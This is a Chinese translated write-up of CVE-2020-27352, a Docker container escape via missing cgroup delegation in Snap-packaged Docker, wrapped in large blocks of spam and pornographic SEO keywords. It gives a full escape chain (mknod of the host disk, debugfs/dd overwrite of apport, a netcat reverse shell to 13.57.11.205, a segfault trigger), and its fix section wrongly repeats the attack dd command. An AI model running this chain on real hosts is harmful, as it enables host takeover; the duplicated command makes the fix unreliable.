精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

Docker越獄,你抓到它了嗎?

云計算
Docker在一夜之間更改了cgroup,這使我們能夠提升權限并獲得主機的root訪問權限。我們能夠利用cgroups在主機上運行反向Shell并獲得代碼執行權限。

[[422795]]

本文轉載自微信公眾號「新鈦云服」,作者徐磊 翻譯。轉載本文請聯系新鈦云服公眾號。

因為一個關于Docker容器安全的事件,把曾一度以穩定性和安全性著稱的Docker,演繹成了擁有特權漏洞的容器引擎,使其能夠直接訪問底層宿主機,就好比CVE-2020-27352安全漏洞導致代碼在主機上執行,一夜之間,Docker容器的安全性形同虛設:

Docker在一夜之間更改了cgroup,這使我們能夠提升權限并獲得主機的root訪問權限。我們能夠利用cgroups在主機上運行反向Shell并獲得代碼執行權限。

此問題是由于Canonical的Snap中的配置錯誤而導致的,并且影響了許多產品。它被指定為CVE-2020-27352

CVE-2020-27352

在為docker生成systemd服務單元時,snapd未指定"Delegate=yes",結果systemd會將進程從這些容器中移入主守護程序的cgroup中。重新加載系統單元時會自動對齊。這可能會向快照中的容器授予原本不希望的其他特權。

一、Linux容器–命名空間和cgroup

Docker是利用cgroup和namespaces來創建安全,可靠和強大的隔離框架。為了構建輕量級容器,需要創建有效的資源管理和隔離,為了使我們能夠虛擬化系統環境,Linux內核以namespace和cgroups來提供低級隔離機制。

從根本上說,namespace是限制Linux進程樹對各種系統實體(例如網絡接口,進程樹,用戶ID和文件系統安裝)的訪問和可見性的機制。

另一方面,Linux cgroups功能不僅提供了一種限制機制,而且還可以管理和說明一組進程的資源使用情況。它限制并監視系統資源,例如CPU時間,系統內存,磁盤帶寬,網絡帶寬等。

這樣看上去cgroup看起來非常安全。是這樣嗎?如果有人在Docker容器上錯誤配置了cgroups那該怎么辦?

讓我們看看Docker在其“安全”網頁上對cgroup的評價:

起到阻止一個容器訪問或影響另一個容器的數據和進程的作用,它們對于抵御某些拒絕服務攻擊非常重要。它們在公共和私有PaaS之類的多租戶平臺上尤其重要,即使在某些應用程序出現異常時,也要保證一致的正常runtime。

這就是說,如果Docker容器的cgroup配置錯誤的話,我們面臨的最糟糕的情況就是拒絕服務。

二、Devices cgroup的特殊案例

盡管cgroup被描述為實現資源核算和限制的機制,但“內核” cgroups文檔中的“Devices” cgroup(也稱為“設備白名單控制器”)比較特殊。因此,Devices cgroup的作用被描述為:

實施cgroup來跟蹤并強制執行對設備文件的打開和mknod限制…”

紅帽Linux指南對此不透明的定義提供了一些啟示:

設備子系統允許或拒絕cgroup中的任務訪問設備。

回到內核cgroups文檔,可以清晰的看到:

訪問權限是r,w和m的組合。

確切地說,從我們的安全角度出發,無論是創建,讀取還是寫入,都要對 Linux內核的設備禁止各種訪問。

受此白名單機制控制的設備可以是內核使用的任何設備。也包括安全的設備,例如/dev/null和/dev/zero,還包括USB設備(例如/dev/uhid),cdroms(/dev/ cdrom),甚至內核的硬盤(例如/dev/sda設備)。

總結來說:Devices cgroup是cgroup子系統中的一個特殊的組成部分,因為它不僅一種“資源核算和限制”機制,而且還是一個內核設備白名單控制器,與系統的資源耗盡相比,它可能造成更大的破壞。

三、從Docker默認容器到主機上的RCE

Systemd是linux下的一種初始化軟件,為系統提供了很多系統組件。它旨在統一不同Linux之間的服務配置,并被大多數Linux發行版廣泛采用。

Systemd的主要組件之一是服務管理器,它用于初始化系統,并且引導系統用戶空間和管理用戶進程。

作為其操作的一部分,systemd創建并管理監視各種cgroup。Systemd的cgroup管理理念基于一些設計思想,包括systemd官方網站引用的“單寫者規則”:

單寫者規則:這意味著每個cgroup中只有一個單寫者,即一個進程管理它。只有一個進程應該擁有一個特定的cgroup,并且當它擁有該cgroup時,它是排他性的,沒有其他東西可以同時對其進行操作。

該規則對docker系統有深遠的影響。

如果容器管理器在系統cgroup中創建和管理cgroup,會違反規則,因為cgroup由systemd管理,因此對其他所有人都沒有限制。

在systemd的控制下,用于管理系統cgroup層次結構中的cgroup的容器runtime違反了此規則,這可能會干擾systemd對cgroup的管理。你可能已經猜到,配置錯誤的systemd服務可能假裝管理自己創建的cgroup,實際上,systemd從上方監督所有事務:管理,創建和刪除服務之下的cgroup ,但是上層根本沒有注意到。

這是容器轉型的核心。

當systemd重新加載一個單元時,它首先清理混亂的cgroup,將子cgroup中產生的所有進程移到較高的進程。特別是,如果systemd管理dockerd服務,它將在重新加載時清除所有docker容器的cgroup,從而將容器進程保留在較高的cgroup子系統層次結構中。

為什么systemd會突然重新加載?

系統重裝比人們想象的要復雜得多。在啟用服務,禁用一項服務,添加服務依賴項等之后,它將重新加載其任何服務的配置文件。這意味著,如果某些事情導致系統服務發生更改,那么即使是不太活躍的服務也可能容易受到影響。

Debian的“無人值守升級就是此類事物的一個著名例子。

無人值守升級是Debian軟件包管理系統之一,其主要目的是“通過最新的具有安全性(及其他)更新自動使計算機保持最新狀態。”

無人值守升級是一項定期任務,它在預配置的時間內運行一次。它會自動下載并安裝安全更新,并且默認情況下會在包括Ubuntu桌面系統和服務器系統在內的各種系統上啟用。升級某些服務時,它們的systemd單元配置會更改,這導致systemd重新加載整個系統,如下:

  1. $ sudo journalctl -u apt-daily-upgrade.service 
  2. Dec 10 08:49:42 ubuntu systemd[1]: Starting Daily apt upgrade and clean activities... 
  3. Dec 10 08:55:51 ubuntu systemd[1]: apt-daily-upgrade.service: Succeeded. 
  4. Dec 10 08:55:51 ubuntu systemd[1]: Finished Daily apt upgrade and clean activities. 

如上所示,Ubuntu每日升級服務始于08:49:42。此過程檢查是否有任何強制性升級或者要下載的應用。以下是自動升級過程的結果:

  1. $ journalctl --no-pager | grep "systemd\[1\]: Reloading\." 
  2. Dec 10 08:50:47 ubuntu systemd[1]: Reloading. 
  3. Dec 10 08:50:48 ubuntu systemd[1]: Reloading. 
  4. Dec 10 08:50:50 ubuntu systemd[1]: Reloading. 

由于每天自動升級,在8:50的時候systemd的重新加載將會連續發生。具有諷刺意味的是,這是安全漏洞的突破口。

四、可能的解決方案

系統開發人員意識到某些服務需要管理自己的cgroup,并允許systemd為這些服務委派cgroup子樹。委托的cgroup本身由systemd管理,但是程序可以自由地在其中創建子cgroup,而不會受到systemd的干擾,如systemd網站中所述:

systemd將不再擺弄cgroup樹的子樹。它不會更改其下的任何cgroup的屬性,也不會創建或刪除其下的任何cgroup,也不會在認為有用的情況下跨子樹的邊界遷移進程。

允許runtime(例如Docker)從systemd請求cgroup委派,從而獲得特權自行管理其cgroup。實際上,我們在各種程序包管理器中檢查的大多數Docker引擎程序包默認情況下都啟用此選項,因此不易受此特定漏洞的影響。

Snap是由Canonical團隊針對基于Linux的系統開發的軟件打包和部署系統。現成的各種Linux發行版都支持它,例如Ubuntu,Manjaro,Zorin OS等。它也可用于許多其他發行版,例如CentOS,Debian,Fedora,Kali Linux,Linux Mint,Pop!_OS,Raspbian,Red Hat Enterprise Linux和openSUSE。許多著名的軟件公司都在Snap Store中出售其軟件。

從Docker 17.03開始,Snap存儲區還提供了自己的Docker引擎和客戶端軟件包。

Snap與systemd內置集成,從而允許包含守護程序的軟件包將自身注冊為systemd單元。安裝了這樣的快照程序包后,快照程序守護程序(snapd)會代表該軟件包的守護程序生成systemd單元文件(systemd配置文件)。

但是,到目前為止,snapd還不支持系統單位文件的Delegate選項。

cgroup的配置錯誤

由于快照中缺少此功能,因此Docker快照無法自己單獨管理容器cgroup,從而使systemd擁有這些cgroup的所有權并暴露這種錯誤配置。

確定了問題的根源之后,讓我們探索一些證據。可以在/proc/ /cgroup下檢查Docker容器的cgroup:

  1. 12:freezer:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  2. 11:cpu,cpuacct:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  3. 10:pids:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  4. 9:blkio:/system.slice/snap.docker.dockerd.service 
  5. 8:cpuset:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  6. 7:devices:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  7. 6:hugetlb:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  8. 5:rdma:/ 
  9. 4:memory:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  10. 3:perf_event:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  11. 2:net_cls,net_prio:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  12. 1:name=systemd:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  13. 0::/system.slice/snap.docker.dockerd.service 

在上面的示例中,我們可以清楚地看到設備cgroup映射到Docker和容器ID(ba339…)下的文件夾。這是我們期望在Docker守護程序管理cgroup時看到的正確映射。

正如我們在系統上看到的那樣,systemd可能會自發接管Docker的容器cgroup,結果如下所示:

  1. 12:freezer:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  2. 11:cpu,cpuacct:/system.slice/snap.docker.dockerd.service 
  3. 10:pids:/system.slice/snap.docker.dockerd.service 
  4. 9:blkio:/system.slice/snap.docker.dockerd.service 
  5. 8:cpuset:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  6. 7:devices:/system.slice/snap.docker.dockerd.service 
  7. 6:hugetlb:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  8. 5:rdma:/ 
  9. 4:memory:/system.slice/snap.docker.dockerd.service 
  10. 3:perf_event:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  11. 2:net_cls,net_prio:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  12. 1:name=systemd:/docker/ba3398f7201b5ececf439dcadea00569d5213ae83f94135b89c3bcc7dadb2136 
  13. 0::/system.slice/snap.docker.dockerd.service 

“ a ”代表所有類型的設備,“ *:*”表示主機上所有可用的設備,“ rwm ”表示我們現在被允許從所有設備讀取,寫入所有設備和Mknod(制造新設備)。

  • 發動攻擊

cgroups的錯誤配置將默認Docker容器變成了對容器環境和底層主機更具有威脅性和攻擊性的東西。

為了演示攻擊,我們將假定在默認Docker容器中運行了一個惡意進程。攻擊分為四個階段:

在容器中,創建與基礎主機的硬盤相對應的設備。

閱讀core_pattern內核文件的內容,看看我們是否可以利用它。

利用內核的核心轉儲文件機制來生成攻擊機的反向shell。

生成分段錯誤,以便內核將生成核心轉儲并接管主機。

  • 階段1:創建設備

查找主機將哪個設備用作其根設備的最佳方法是詢問/proc/cmdline文件。

  1. root@ba3398f7201b:/tmp# cat /proc/cmdline 
  2. BOOT_IMAGE=/boot/vmlinuz-5.9.0 root=UUID=43796265-7241-726b-204c-6162732052756c65 ro find_preseed=/preseed.cfg auto noprompt priority=critical locale=en_US quiet 

現在,我們需要使用帶有根UUID的findfs來查找實際的Linux設備:

  1. root@ba3398f7201b:/tmp# findfs UUID=43796265-7241-726b-204c-6162732052756c65 
  2. /dev/sda5 

我們還可以簡單地使用mount和lsblk查找主機的硬盤驅動器設備。

現在創建設備:

  1. root@ba3398f7201b:/tmp# mknod /dev/sda5 b 8 5 
  • 階段2:利用Linux核心轉儲文件機制

在大多數GNU/Linux系統中,當某些用戶進程崩潰時,內核會生成核心轉儲文件。例如,當應用程序由于無效的內存訪問(SIGSEGV)而崩潰時,將生成一個核心文件。此核心轉儲文件包含終止時進程內存的映像,有助于調試應用程序崩潰。這樣的故障信號可以容易地從容器內部產生。

位于/proc/sys/kernel/中的core_pattern文件用于指定核心轉儲文件名稱模式。我們可以使用預定的corename格式說明符來確定內核在生成核心轉儲文件時應使用的確切文件名,但是,如果core_pattern文件的第一個字符是管道'|',內核會將其余模式視為運行的命令。

讓我們檢查core_pattern文件:

  1. root@ba3398f7201b:/tmp# cat /proc/sys/kernel/core_pattern 
  2. |/usr/share/apport/apport %p %s %c %d %P %E 

因此,無論何時生成核心轉儲,內核都將執行/usr/share/中的apport文件。現在,我們應該可以訪問主機的硬盤,并可以檢查是否可以讀取apport文件然后進行更改。

  • 階段3:訪問并接管apport文件

在此階段,我們使用debugfs –一種特殊的文件系統調試實用程序,它支持直接從硬盤驅動器設備進行讀取和寫入。

  1. root@ba3398f7201b:/tmp# debugfs /dev/sda5 
  2. debugfs 1.42.12 (29-Aug-2014) 
  3. debugfs: 

我們可以像使用shell提示符一樣使用debugfs提示符。因此,我們更改為/usr/share/apport/:

  1. debugfs: cd /usr/share/apport 

然后使用stat獲取有關apport文件的信息:

  1. debugfs:  stat apport 
  2. Inode: 1180547   Type: regular    Mode:  0755   Flags: 0x80000 
  3. Generation: 3835493899    Version: 0x00000000:00000001 
  4. User:     0   Group:     0   Size: 29776 
  5. File ACL: 0    Directory ACL: 0Links: 1   Blockcount: 64 
  6. Fragment:  Address: 0    Number: 0    Size: 0 
  7.  ctime: 0x5fe09286:061f76dc -- Mon Dec 21 12:18:14 2020 
  8.  atime: 0x5fe1e665:32c27c14 -- Tue Dec 22 12:28:21 2020 
  9.  mtime: 0x5fe09286:061f76dc -- Mon Dec 21 12:18:14 2020 
  10. crtime: 0x5fb63c3a:359629b8 -- Thu Nov 19 09:34:50 2020 
  11. Size of extra inode fields: 32 
  12. EXTENTS: 
  13. (0-7):5330129-5330136 

我們將使用此信息從基礎主機硬盤讀取和寫入apport文件。

為此,我們將使用Linux實用程序dd,該實用程序允許我們從Linux設備讀取和寫入特定信息。

  1. root@ba3398f7201b:/tmp# dd if=/dev/sda5 skip=42641032  count=64  of=/tmp/apport 

現在我們在容器的/tmp/apport中擁有整個apport文件,讓我們看一下其中的內容:

  1. root@ba3398f7201b:/tmp# cat apport | more 
  2. #!/usr/bin/python3 
  3.  
  4. # Collect information about a crash and create a report in the directory 
  5. # specified by apport.fileutils.report_dir. 
  6. # See https://wiki.ubuntu.com/Apport for details. 
  7. # Copyright (c) 2006 - 2016 Canonical Ltd. 
  8. # Author: Martin Pitt <martin.pitt@ubuntu.com> 
  9. # This program is free software; you can redistribute it and/or modify it 
  10. # under the terms of the GNU General Public License as published by the 
  11. Free Software Foundation; either version 2 of the License, or (at your 
  12. optionany later version.  See http://www.gnu.org/copyleft/gpl.html for 
  13. # the full text of the license. 
  14.  
  15. import sys, os, os.path, subprocess, time, traceback, pwd, io 
  16. import signal, inspect, grp, fcntl, socket, atexit, array, struct 
  17. import errno, argparse 
  18. import apport, apport.fileutils 
  19. # functions 
  20. --More-- 

該文件看起來像python3腳本,因此我們要做的就是添加os.system()調用以運行netcat反向shell。由于我們無意更改文件的大小,因此我們還需要確保從文件中刪除與添加到文件中的字符數相同的字符。

由于我們的攻擊機器正在偵聽端口8081處的IP 13.57.11.205,因此添加以下行:

  1. os.system(‘/usr/bin/busybox nc 13.57.11.205 8081 -e/bin/bash’) 

并保存文件。

接下來,我們應該將文件復制回硬盤驅動器。為此,我們再次使用“ dd”:

  1. root@ba3398f7201b:/tmp# dd of=/dev/sda5 seek=42641032 count=64 if=/tmp/apport 

注意,我們切換了輸入文件(if)和輸出文件(of),現在我們使用'seek'而不是'skip'。

所以,現在我們已經寫了Apport會文件恢復到主機的文件系統,我們已經準備好了4個階段的攻擊。

  • 階段4:武器化

為了武器化我們創建的設置,我們要做的就是生成一個細分錯誤。

我們可以通過編譯并執行以下簡短的c代碼來做到這一點:

  1. int main( void) 
  2.      char *aaa = 0; 
  3.      *aaa = 0; 
  4.      return 1;                // this line should not be reached… 

在成功針對Docker默認容器為該漏洞提供武器之后,我們著手找出其他哪些容器/沙盒供應商也容易受到攻擊。kubernetes,microk8s和已棄用的AWS IoT Greengrass V1也受此問題影響,并且容易受到此類攻擊。

結論:如果使用Canonical的Snap軟件包管理器管理軟件包,則系統可能容易受到CVE-2020-27352的攻擊,就容器而言,這是一個嚴重的漏洞,并且可能會影響數百萬個Linux臺式機和服務器。

容器的安全性僅與整個系統(包括Linux初始化和服務管理器以及Linux軟件包管理器)的配置一樣安全。正如我們已經證明的那樣,必須注意確保整個系統(不僅是Docker的系統)的配置能夠支持容器框架的多種需求。

如果您的Linux系統配置不正確,您可以使用以下命令,手動編輯系統Docker服務單元文件作為臨時解決方法:

  1. contena@ubuntu: $ sudo systemctl edit snap.docker.dockerd.service 

然后添加以下行:Delegate = yes。保存文件并使用以下命令重新加載:

  1. root@ba3398f7201b:/tmp# dd of=/dev/sda5 seek=42641032 count=64 if=/tmp/apport 

 

原文:https://www.cyberark.com/resources/threat-research-blog/the-strange-case-of-how-we-escaped-the-docker-default-container

 

責任編輯:武曉燕 來源: 新鈦云服
相關推薦

2022-09-21 07:22:39

mongodb版本docker

2019-01-08 14:28:11

2023-06-12 07:41:16

dockerspark集群

2013-08-02 10:02:11

Windows 8 R

2020-11-14 15:43:35

人工智能算法象棋

2018-07-23 15:50:43

iOS越獄蘋果

2015-01-07 10:45:05

Dockerkubernetescontain

2012-01-13 13:05:41

Scale Out網絡

2009-06-22 14:36:09

ITIL運維管理摩卡軟件

2010-08-04 15:01:00

2012-08-29 09:44:20

免費增值

2012-03-12 13:47:05

移動廣告

2013-07-15 16:55:45

2018-09-06 22:54:58

2017-01-13 15:09:09

2024-01-19 08:25:38

死鎖Java通信

2021-11-23 20:22:54

貪心數量策略

2022-12-30 08:35:00

2022-04-01 08:23:17

InputstreString字符串

2023-07-26 13:11:21

ChatGPT平臺工具
點贊
收藏

51CTO技術棧公眾號

波多野结衣一区二区三区| 欧美1区3d| 精品视频一区三区九区| 国产又粗又硬又长| 色一情一乱一区二区三区| 噜噜噜躁狠狠躁狠狠精品视频 | 国产传媒在线看| 一区二区三区视频免费视频观看网站 | 久久国产精品免费| 欧美劲爆第一页| 天天躁夜夜躁狠狠是什么心态| 日韩视频在线直播| 色偷偷成人一区二区三区91| 国产成人一区二区三区别| 国内三级在线观看| 成人性生交大片| 国产欧亚日韩视频| 免费无码国产精品| 亚洲国产综合在线看不卡| 在线免费看av不卡| v8888av| 国产精品国产三级在线观看| 欧美在线免费视屏| 精品欧美一区免费观看α√| 黄色免费网站在线| 久久精品网站免费观看| 国产一区喷水| jizz国产视频| 久久草av在线| 国产精品九九九| 可以在线观看av的网站| 欧美激情1区2区| www.久久色.com| 欧美波霸videosex极品| 色哟哟精品丝袜一区二区| 亚洲国产精久久久久久久| 日本高清免费在线视频| 欧美v亚洲v综合v国产v仙踪林| 欧美日韩美女在线观看| 婷婷五月综合缴情在线视频| 日韩激情美女| 一区二区三区四区高清精品免费观看| 一区二区精品免费视频| av在线播放网| 国产三级欧美三级| 日本午夜精品一区二区三区| 污污视频在线观看网站| 成人少妇影院yyyy| 亚洲v日韩v综合v精品v| 国产视频一区二区三| 黑人精品欧美一区二区蜜桃| 91精品久久久久久久久| 国产精品久久免费| 国产在线精品一区二区不卡了| 国产日韩专区在线| 国产精品老熟女视频一区二区| 美女视频黄频大全不卡视频在线播放| 国产精品福利在线观看| 日本黄色中文字幕| 蜜臀av一区二区在线观看| 国产区精品在线观看| 一区二区三区免费在线| 精品一二三四区| 亚洲在线观看视频| 国产 日韩 欧美 综合| 成人h动漫精品一区二| 九九九九精品九九九九| 色视频在线观看福利| www一区二区| 亚洲天堂电影网| 黄在线免费看| 亚洲妇熟xx妇色黄| 日韩中文字幕三区| 日日av拍夜夜添久久免费| 欧美视频一区二区在线观看| 污污视频网站在线| 91亚洲无吗| 亚洲精品一区中文字幕乱码| jizz18女人高潮| 欧美在线免费| 欧美一级视频一区二区| 伊人网视频在线| 成人网页在线观看| 欧美理论一区二区| 色多多视频在线观看| 一区二区在线观看视频在线观看| 久久久久99精品成人片| 最新日韩一区| 精品日韩一区二区| av黄色免费网站| 天天射成人网| 欧美一区二区三区四区在线| 中文字幕av网站| 丁香另类激情小说| 亚洲v欧美v另类v综合v日韩v| 99re在线视频| 亚洲v精品v日韩v欧美v专区| 手机看片一级片| 狠狠久久伊人| 久久亚洲精品中文字幕冲田杏梨 | 亚洲黄色成人| 国产精品综合不卡av| 成人免费视频国产| 国产精品视频九色porn| 国内精品视频一区二区三区| 国产激情欧美| 日韩精品免费电影| 九九热最新地址| 视频一区视频二区中文| 97se视频在线观看| 日韩美女网站| 色婷婷av一区二区三区大白胸| 久久精品亚洲天堂| 经典一区二区| 91精品国产777在线观看| 国产一区二区三区黄片| 久久色中文字幕| 国产精品久久国产| 国产成人福利夜色影视| 国产视频自拍一区| 久久久久久久久久久久国产| 日本成人中文字幕| 久久久久久久久久久久久9999| 国产原创精品视频| 91国内精品野花午夜精品| 欧美双性人妖o0| 黄色亚洲在线| 99蜜桃在线观看免费视频网站| yiren22综合网成人| 一本色道a无线码一区v| 99re久久精品国产| 亚洲视频免费| 51国偷自产一区二区三区的来源| 91涩漫在线观看| 色婷婷激情综合| 欧美精品欧美极品欧美激情| 亚洲国产二区| 国产精品二区三区| 欧美大胆的人体xxxx| 日韩一二三区视频| 欧洲猛交xxxx乱大交3| 精品一区二区久久| 国产精品夜夜夜爽张柏芝| 国产精品99| 日韩中文字幕在线视频| 夜夜躁狠狠躁日日躁av| 国产精品色哟哟网站| 手机在线看福利| 日本a级不卡| 国产精品99久久久久久久久 | 一本久道综合色婷婷五月| 亚洲va久久久噜噜噜久久| 97久久精品在线| 手机福利小视频在线播放| 欧美日韩国产在线| 日韩精品无码一区二区三区久久久| 亚洲一区欧美激情| 欧美日韩一区二区视频在线| jizz久久久久久| 久久人人爽亚洲精品天堂| av天堂一区二区三区| 亚洲一区二区三区自拍| 日韩 中文字幕| 午夜在线一区| 色视频一区二区三区| 日韩毛片免费看| 成年无码av片在线| 亚洲风情第一页| 香蕉成人啪国产精品视频综合网| a级一a一级在线观看| 久久99伊人| 亚洲精品成人久久久998| 国产免费av国片精品草莓男男| 欧美成人网在线| 日韩中文字幕观看| 日本精品一级二级| 亚洲熟女www一区二区三区| 97久久精品人人澡人人爽| 久久九九国产视频| 国产精品久久久久久久免费观看| 成人av资源| 日韩电影av| 久久中文精品视频| 污视频网站免费观看| 欧美午夜精品电影| 国产一级一片免费播放放a| 国产日韩精品一区二区三区| 九九九九九伊人| 国产午夜精品一区二区三区欧美| 污视频在线免费观看一区二区三区 | 亚洲一区二区三区蜜桃| 国产资源精品在线观看| 麻豆tv在线播放| 91久久夜色精品国产按摩| 国产精品12| 日韩一区二区三区免费| 大量国产精品视频| 狠狠v欧美ⅴ日韩v亚洲v大胸| 欧美日韩国产三级| 看片网址国产福利av中文字幕| 国产精品久久久久久一区二区三区 | 久久成人人人人精品欧| 飘雪影院手机免费高清版在线观看 | 37pao成人国产永久免费视频| 久久久久久久久久久久久久久久久久 | 尤物tv在线精品| 91在线短视频| 国产麻豆一区| 51ⅴ精品国产91久久久久久| 26uuu亚洲电影在线观看| 国产一区二区三区在线看| 黄色美女一级片| 欧美一区二区在线看| 国产在线一级片| 天天综合日日夜夜精品| 青青青在线免费观看| 国产精品色婷婷| av电影网站在线观看| aaa国产一区| 中文字幕第六页| 久久精品国产一区二区| 六月丁香婷婷在线| 亚洲久久视频| 黄网站色视频免费观看| 国产精品99视频| 亚洲成人精品电影在线观看| 国产成人精品999在线观看| 精品999在线观看| 97se亚洲国产一区二区三区| 91社区国产高清| 亚洲网站免费| 国产精品亚发布| 欧美成人xxxx| 国产精品中文字幕在线| 日韩精品第一| 国产精品日韩专区| 99久久er| 国产精品一区二区久久精品 | 成人免费视频视频在| 国产高清亚洲| 亚洲一区二区在线播放| 日本99精品| 亚洲a在线播放| 久久精品一级| 99精品国产一区二区| 国产欧美日韩电影| 国产精品99久久久久久白浆小说| 电影亚洲精品噜噜在线观看| 国产精品第一第二| 国产成人精品一区二区三区在线| 国产精品网站大全| 电影91久久久| 国产精品午夜av在线| 麻豆国产欧美一区二区三区r| 国产欧美一区二区在线播放| 欧美18xxxx| 欧美精品一区二区三区久久| 国产一区二区欧美| 一区二区三区免费看| 国产精品久久久乱弄| 九九久久九九久久| 99精品免费| 成人精品视频一区二区| 另类欧美日韩国产在线| 亚洲男人天堂2021| 成人午夜精品一区二区三区| 疯狂揉花蒂控制高潮h| 国产日韩欧美精品一区| 亚洲色图综合区| 丁香花在线影院| 久久精品视频播放| 欧美亚洲系列| 欧美专区在线观看| 国产激情久久| 99久热re在线精品996热视频| 欧美大奶一区二区| 无遮挡亚洲一区| 欧美日韩中文| 白嫩少妇丰满一区二区| 九九久久精品视频| 一级黄色免费视频| 国产免费成人在线视频| 欧美三级日本三级| 色综合婷婷久久| a天堂中文在线观看| 亚洲片在线观看| 日本欧美电影在线观看| 国产成人精品电影| 欧美国产中文高清| 欧美在线视频二区| 欧美1区2区视频| 日本美女高潮视频| 成人综合在线视频| 99在线视频免费| 亚洲www啪成人一区二区麻豆| 国产一级片一区二区| 精品成人一区二区| 在线a人片免费观看视频| 久久免费视频在线观看| 精品福利在线| 精品亚洲第一| 欧美日韩一区二区三区四区在线观看 | 在线观看成人免费视频| 丰满人妻一区二区三区无码av| 一本大道亚洲视频| 嗯~啊~轻一点视频日本在线观看| 国产精品女人久久久久久| 欧美日韩一本| eeuss中文| 日韩**一区毛片| 一级特级黄色片| 亚洲一区二区三区四区的| 一区二区三区精彩视频| 国产亚洲精品美女久久久久 | 国产精品亚洲激情| 亚洲精品亚洲人成在线| 日韩精品久久一区二区| 精品一区二区日韩| 真实乱视频国产免费观看| 亚洲高清视频在线| 精品人妻无码一区二区| 中文字幕精品久久久久| **欧美日韩在线观看| 精品人伦一区二区三区| 国色天香一区二区| 在线免费黄色小视频| 国产精品国产自产拍高清av王其| 亚洲 日本 欧美 中文幕| 亚洲激情视频在线播放| 麻豆福利在线观看| 99热在线播放| 国产一区观看| 国内自拍偷拍视频| 亚洲精品国产无天堂网2021 | 日韩成人手机在线| 国内久久婷婷综合| 日本一级特级毛片视频| 欧美日韩一级视频| 3p在线观看| 国产欧美精品日韩| 久久精品国产大片免费观看| 韩国中文字幕av| 国产精品久久二区二区| 伊人免费在线观看| 日韩中文字幕视频在线观看| 欧美特黄色片| 日本成人性视频| 国产精品一级片| 久艹视频在线观看| 精品女同一区二区| heyzo在线播放| 免费看成人片| 日本欧洲一区二区| 91麻豆精品久久毛片一级| 91.com在线观看| 色噜噜狠狠狠综合欧洲色8| 国产另类自拍| 久久精品人人做人人爽电影蜜月| 麻豆精品免费视频| 欧美日韩精品一区视频| 主播国产精品| 精品久久久久久乱码天堂| 欧美亚洲专区| 中文字幕第69页| 日韩一区二区电影网| 51精品视频| 欧洲视频一区二区三区| 久久97超碰色| 国产一级中文字幕| 亚洲欧美成人精品| 国产精品久久久久久久久免费高清| 最新av在线免费观看| 成人免费观看视频| 国产又大又粗又爽| 日韩在线欧美在线国产在线| 韩国三级大全久久网站| 天堂…中文在线最新版在线| 中文一区一区三区高中清不卡| 91高潮大合集爽到抽搐| 欧美精品久久久久久久久| 台湾佬综合网| 亚洲黄色av片| 精品免费在线视频| 色哟哟免费在线观看| 狠狠爱一区二区三区| 麻豆成人在线观看| 国产午夜久久久| 国产亚洲精品久久久久久牛牛| 日韩成人久久| 日本成人中文字幕在线| 亚洲视频1区2区| 韩日在线视频| 国产一区二区高清不卡| 蜜桃久久久久久| 日韩毛片在线视频| 久久精品视频网站| 国产不卡一区| 91精品啪在线观看国产| 欧美精品久久一区二区三区| 日本黄色免费在线|